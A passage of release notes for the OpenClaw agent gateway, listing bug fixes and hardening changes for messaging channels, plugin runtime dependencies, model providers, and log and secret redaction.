<p>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</p>
</li>
<li>
<p>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</p>
</li>
<li>
<p>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</p>
</li>
<li>
<p>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</p>
</li>
<li>
<p>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</p>
</li>
<li>
<p>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</p>
</li>
<li>
<p>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</p>
</li>
<li>
<p>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</p>
</li>
<li>
<p>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</p>
</li>
<li>
<p>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</p>
</li>
<li>
<p>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</p>
</li>
<li>
<p>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</p>
</li>
<li>
<p>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</p>
</li>
<li>
<p>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</p>
</li>
<li>
<p>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</p>
</li>
<li>
<p>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</p>
</li>
<li>
<p>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</p>
</li>
<li>
<p>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</p>
</li>
<li>
<p>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</p>
</li>
<li>
<p>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</p>
</li>
<li>
<p>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</p>
</li>
<li>
<p>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</p>
</li>
<li>
<p>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</p>
</li>
<li>
<p>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</p>
</li>
<li>
<p>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</p>
</li>
<li>
<p>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</p>
</li>
<li>
<p>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</p>
</li>
<li>
<p>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</p>
</li>
<li>
<p>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</p>
</li>
<li>
<p>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</p>
</li>
<li>
<p>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</p>
</li>
<li>
<p>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</p>
</li>
<li>
<p>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</p>
</li>
<li>
<p>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</p>
</li>
<li>
<p>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</p>
</li>
<li>
<p>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
